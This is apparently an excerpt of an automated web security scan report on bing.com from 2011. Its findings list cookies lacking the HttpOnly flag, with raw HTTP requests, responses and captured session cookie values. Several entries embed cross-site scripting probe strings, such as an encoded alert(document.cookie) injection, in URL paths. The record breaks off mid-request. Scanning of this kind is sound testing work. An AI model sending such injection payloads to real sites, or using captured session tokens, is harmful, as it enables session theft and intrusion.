Set-Cookie: _SS=SID=3156FC6FA1B4456BB9BC9890E342EC52; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   

...[SNIP]...

3.3. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-los-angeles.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-los-angeles.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=10; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-3n2vnipb2oiulyz4dk98nomu7t6s_VID-2999kjki8gjlyz46o65lm9u4oc6_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:33 GMT; Path=/travel
Set-Cookie: JSESSIONID=A0A8F410795893A332A965C69339FF7E; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3FA678BC8CC54FFDB405305453C54626; domain=.bing.com; path=/
Content-Length: 134700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

3.4. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/weekend-deals-flight-deals.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/weekend-deals-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=8; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-2n3vc7stv0gusyz5ai187p3t99ue_VID-2rvgvj2qaejf8yz78uik5p44jda5_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:26 GMT; Path=/travel
Set-Cookie: JSESSIONID=D94BD82022034E3E99FAD80B6425BC45; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=7EF6DBEDCE444E9D9CD7ABFBFF0883A1; domain=.bing.com; path=/
Content-Length: 116517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

3.5. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/las-vegas-nevada-trips-1003502
Date: Fri, 11 Feb 2011 21:46:19 GMT
Connection: close
Set-Cookie: lbc=18; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z7s38rpfkercl2yz74rb2hu9cnuco_VID-z1n8ppi7nv5f10yz79ofvl7lheql4_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:19 GMT; Path=/travel
Set-Cookie: JSESSIONID=B5BCC216FD00F37E72162E209E5DC133; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460779; domain=.bing.com; path=/
Set-Cookie: _SS=SID=998AC92DF8DE4176A8D10B5E59C5D155; domain=.bing.com; path=/


3.6. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/orlando-florida-hotels-hostels-motels-1004643 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/orlando-florida-trips-1004643
Date: Fri, 11 Feb 2011 21:46:20 GMT
Connection: close
Set-Cookie: lbc=914; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gavb6tgt9cj3yz537ou28tfef9i_VID-3hj6nr643agpayz6dbfcgvh3fvaj_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:20 GMT; Path=/travel
Set-Cookie: JSESSIONID=E95235E963A2DF8E29889E5BBD935FF3; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:20 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460780; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8C47D5A8725040C1BB26FE4119092907; domain=.bing.com; path=/


3.7. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:49 GMT
Content-Length: 27957
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:49 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D112E558C1254059A8053EF8937619A6; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

3.8. http://www.bing.com/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /browse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F3588EE7150F4A06A38A556D2979D3C1; domain=.bing.com; path=/
Content-Length: 39120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

3.9. http://www.bing.com/events/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:48 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=48D2324963F04E158870DD7D33820F4D; domain=.bing.com; path=/
Content-Length: 68849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

3.10. http://www.bing.com/images/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/images
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=62FB203ABE6B4340BB2B5B957921B4A1; domain=.bing.com; path=/
Content-Length: 61264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

3.11. http://www.bing.com/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _HOP=; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.bing.com:80/local/
X-BM-TraceID: c2fe4ba620f6480b9d5cb06a42abadfc
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _HOP=I=1&TS=1297463871; domain=.bing.com; path=/
Content-Length: 146

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bing.com:80/local/">here</a>.</h2>
</body></html>

3.12. http://www.bing.com/local/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=I=1&TS=1297463870

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: d9d8131b7c4346e5aa71689035bb388d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001201
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 26774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.13. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: f4d43589310840319542d23ff07183eb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js
Content-Length: 18141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.14. http://www.bing.com/local/aa461'-alert(&/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(&/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://burp/show/24
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _HOP=I=1&TS=1297461512; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 3429946a5cf34aa49767b210cdf94acb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(&
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 17629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.15. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b18f22ca108041f092c7441b3e508e6b
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(&/undefined/js
Content-Length: 17463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.16. http://www.bing.com/local/us/co/colorado%20springs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/us/co/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
